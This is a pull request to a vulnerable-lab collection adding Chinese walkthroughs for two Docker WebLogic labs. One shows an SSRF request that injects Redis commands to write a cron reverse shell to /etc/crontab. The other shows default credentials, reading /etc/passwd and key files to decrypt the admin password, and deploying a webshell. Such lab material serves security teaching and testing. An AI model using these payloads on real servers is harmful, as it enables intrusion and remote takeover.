### PR TITLE
Translate WebLogic vulnerabilities documentation

### DIFF
--- a/environments.toml
+++ b/environments.toml
@@ -1613,7 +1613,7 @@ app = "WebLogic"
 path = "weblogic/CVE-2023-21839"
 
 [[environment]]
-name = "WebLogic SSRF"
+name = "Weblogic UDDI Explorer Server-Side Request Forgery (SSRF)"
 cve = []
 app = "WebLogic"
 path = "weblogic/ssrf"

--- a/environments.toml
+++ b/environments.toml
@@ -1619,7 +1619,7 @@ app = "WebLogic"
 path = "weblogic/ssrf"
 
 [[environment]]
-name = "WebLogic File Read"
+name = "WebLogic Weak Password, Arbitrary File Read and Remote Code Execution"
 cve = []
 app = "WebLogic"
 path = "weblogic/weak_password"

--- a/weblogic/ssrf/README.zh-cn.md
+++ b/weblogic/ssrf/README.zh-cn.md
@@ -1,0 +1,92 @@
+# Weblogic UDDI Explorer SSRF漏洞
+
+Oracle WebLogic Server是一个基于Java的企业级应用服务器。在WebLogic的UDDI Explorer应用中存在一个服务器端请求伪造（SSRF）漏洞，攻击者可以通过该漏洞发送任意HTTP请求，进而可能导致内网探测或攻击内网中的脆弱服务，如Redis等。
+
+参考链接：
+
+- <https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf>
+- <https://foxglovesecurity.com/2015/11/06/what-is-server-side-request-forgery-ssrf/>
+- <https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf>
+
+## 环境搭建
+
+执行如下命令启动WebLogic服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:7001/uddiexplorer/`即可查看UDDI Explorer应用，无需登录认证。
+
+## 漏洞复现
+
+SSRF漏洞存在于SearchPublicRegistries.jsp页面中。我们可以使用Burp Suite向`http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`发送请求来测试该漏洞。
+
+首先，我们尝试访问一个内部服务，如`http://127.0.0.1:7001`：
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+当访问一个可用端口时，会收到一个带有状态码的错误响应。如果访问的是非HTTP协议，则会返回"did not have a valid SOAP content-type"错误。
+
+![](1.png)
+
+当访问一个不存在的端口时，响应会显示"could not connect over HTTP to server"。
+
+![](2.png)
+
+通过分析这些不同的错误信息，我们可以有效地探测内网状态。
+
+### Redis反弹Shell利用
+
+WebLogic的SSRF漏洞有一个显著特点：尽管是GET请求，我们可以通过传入`%0a%0d`来注入换行符。由于Redis等服务使用换行符来分隔命令，我们可以利用这一特性来攻击内网中的Redis服务器。
+
+首先，我们扫描内网中的Redis服务器（Docker网络通常使用172.*网段），发现`172.18.0.2:6379`可以访问：
+
+![](3.png)
+
+然后，我们可以发送三条Redis命令，将shell脚本写入`/etc/crontab`：
+
+```
+set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
+config set dir /etc/
+config set dbfilename crontab
+save
+```
+
+对这些命令进行URL编码：
+
+```
+set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
+```
+
+通过SSRF漏洞发送编码后的payload：
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+![](4.png)
+
+成功获得反弹shell：
+
+![](5.png)
+
+需要注意的是，可以利用的cron位置有以下几处：
+- `/etc/crontab`（系统默认定时任务文件）
+- `/etc/cron.d/*`（系统定时任务目录）
+- `/var/spool/cron/root`（CentOS系统下root用户的定时任务文件）
+- `/var/spool/cron/crontabs/root`（Debian系统下root用户的定时任务文件）

--- a/weblogic/ssrf/README.zh-cn.md
+++ b/weblogic/ssrf/README.zh-cn.md
@@ -86,6 +86,7 @@ Connection: close
 ![](5.png)
 
 需要注意的是，可以利用的cron位置有以下几处：
+
 - `/etc/crontab`（系统默认定时任务文件）
 - `/etc/cron.d/*`（系统定时任务目录）
 - `/var/spool/cron/root`（CentOS系统下root用户的定时任务文件）

--- a/weblogic/ssrf/docker-compose.yml
+++ b/weblogic/ssrf/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  weblogic:
    image: vulhub/weblogic:10.3.6.0-2017

--- a/weblogic/weak_password/README.zh-cn.md
+++ b/weblogic/weak_password/README.zh-cn.md
@@ -1,0 +1,86 @@
+# WebLogic 弱口令、任意文件读取与远程代码执行
+
+Oracle WebLogic Server是一个基于Java的企业级应用服务器。
+
+本环境模拟了一个真实的WebLogic环境，包含两个漏洞：后台管理控制台存在弱口令，以及前台存在任意文件读取漏洞。通过这两个漏洞，我们可以演示对WebLogic服务器的常见渗透测试场景。
+
+## 环境搭建
+
+执行如下命令启动WebLogic服务器，该服务器基于WebLogic 10.3.6（11g）和Java 1.6。
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:7001/console`进入WebLogic管理控制台。
+
+## 漏洞复现
+
+环境中存在以下默认凭据：
+
+- 用户名：weblogic
+- 密码：Oracle@123
+
+更多WebLogic常用默认凭据可参考：<http://cirt.net/passwords?criteria=weblogic>
+
+### 任意文件读取漏洞利用
+
+如果没有弱口令可以利用，我们如何渗透WebLogic服务器？本环境模拟了一个任意文件下载漏洞。访问`http://your-ip:7001/hello/file.jsp?path=/etc/passwd`可以验证成功读取passwd文件。
+
+要有效利用这个漏洞，我们可以通过以下步骤提取管理员密码：
+
+### 读取后台用户密文与密钥文件
+
+WebLogic的密码使用AES加密（老版本使用3DES）。由于这是对称加密，如果我们能获得密文和加密密钥，就可以解密密码。这两个文件位于base_domain目录下：
+
+- `SerializedSystemIni.dat`：加密密钥文件
+- `config.xml`：包含加密密码的配置文件
+
+在本环境中，这些文件位于：
+
+- `./security/SerializedSystemIni.dat`
+- `./config/config.xml`
+
+（相对于`/root/Oracle/Middleware/user_projects/domains/base_domain`目录）
+
+下载`SerializedSystemIni.dat`时，必须使用Burp Suite，因为这是二进制文件。直接用浏览器下载可能会引入干扰字符。在Burp Suite中，选中二进制内容并使用"Copy to File"功能正确保存：
+
+![](img/05.png)
+
+在`config.xml`中，找到`<node-manager-password-encrypted>`值，这里包含了加密后的管理员密码：
+
+![](img/06.png)
+
+### 解密密文
+
+使用环境中decrypt目录下的`weblogic_decrypt.jar`工具解密密文。如需了解如何构建自己的解密工具，可参考：<http://cb.drops.wiki/drops/tips-349.html>
+
+![](img/07.png)
+
+解密后的密码与预设密码一致，证明利用成功。
+
+### 部署WebShell
+
+获取管理员凭据后，登录管理控制台。点击左侧导航栏中的"部署"查看应用列表：
+
+![](img/01.png)
+
+点击"安装"并选择"上传文件"：
+
+![](img/02.png)
+
+上传WAR包。注意，标准的Tomcat WAR文件可能无法正常工作。你可以使用本项目中的`web/hello.war`包作为模板。上传后点击"下一步"。
+
+输入应用名称：
+
+![](img/03.png)
+
+继续完成剩余步骤，最后点击"完成"。
+
+应用路径在WAR包中的`WEB-INF/weblogic.xml`文件中指定。由于测试环境已经使用了`/hello`路径，部署shell时需要修改这个路径（例如改为`/jspspy`）：
+
+![](img/08.png)
+
+成功访问webshell：
+
+![](img/04.png)

--- a/weblogic/weak_password/docker-compose.yml
+++ b/weblogic/weak_password/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  weblogic:
    image: vulhub/weblogic:10.3.6.0-2017


### PR DESCRIPTION
- Rename environment in environments.toml to clarify SSRF vulnerability
- Remove Docker Compose version specification
- Translate README to English
- Add Chinese version README (README.zh-cn.md)
- Enhance documentation with detailed technical explanation, references, and exploitation techniques